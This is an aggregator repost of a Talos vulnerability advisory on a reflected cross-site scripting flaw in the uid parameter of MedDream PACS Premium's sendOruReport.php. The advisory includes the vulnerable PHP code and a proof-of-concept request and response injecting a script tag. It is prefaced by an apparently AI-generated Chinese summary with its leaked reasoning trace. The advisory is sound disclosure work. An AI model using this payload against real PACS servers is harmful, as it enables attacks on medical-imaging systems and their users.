嗯,用户让我帮忙总结一下这篇文章的内容,控制在100个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。 首先,我得通读一下文章。看起来这篇文章是关于MedDream PACS Premium 7.3.6.870版本中的一个反射型跨站脚本(XSS)漏洞。漏洞存在于sendOruReport.php脚本中,具体是uid参数没有被正确处理,导致攻击者可以构造恶意URL,执行任意JavaScript代码。 接下来,我需要提取关键信息:漏洞类型是反射型XSS,影响版本是7.3.6.870,CVSS评分是6.1,CWE编号是79。此外,漏洞出现在uid参数处理上,攻击者可以注入恶意代码。 现在我要把这些信息浓缩到100字以内。可能的结构是:描述漏洞类型、受影响产品和版本、漏洞原因、攻击方式以及CVSS评分。 比如:“MedDream PACS Premium 7.3.6.870版本中存在反射型XSS漏洞。攻击者通过构造恶意URL利用uid参数注入JavaScript代码。该漏洞未对输入进行充分验证和过滤。” 这样大概在50字左右,符合要求。同时避免了使用开头语句。 </think> MedDream PACS Premium 7.3.6.870版本中存在反射型XSS漏洞。攻击者通过构造恶意URL利用uid参数注入JavaScript代码。该漏洞未对输入进行充分验证和过滤。 2026-1-20 00:0:33 Author: talosintelligence.com(查看原文) 阅读量:0 收藏
SUMMARY
A reflected cross-site scripting (xss) vulnerability exists in the sendOruReport functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
PRODUCT URLS
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
CVSSv3 SCORE
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
DETAILS
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
A pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/sendOruReport.php script.
The value of the uid parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 180
} else {
$dbcon = new MyConnection();
$username = $dbcon->username;
$hl7app = $_GET["hl7app"];
$studyUid = $_GET["uid"]; /// [1]
}
// line 208
} else {
print "<h2><font color=red>";
print "Failed to build HL7 ORU Report message for Dicom study: <u>$studyUid</u>"; /// [2]
print "</font></h2>";
}
The $studyUid variable is set by the attacker and is fully controllable [1]. If there is no entry for specified uid value inside the database, $studyUid value is printed directly into the page content without sanitization [2],
Example of a malicious request and response containing injected HTML/JavaScript code:
GET /Pacs/sendOruReport.php?uid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Wed, 20 Aug 2025 13:15:12 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Set-Cookie: PHPSESSID=f3a98e0198009872365980fae35cf361; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<h2><font color=red>Failed to build HL7 ORU Report message for Dicom study: <u><script>alert(1)</script></u></font></h2>
TIMELINE
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.
如有侵权请联系:admin#unsafe.sh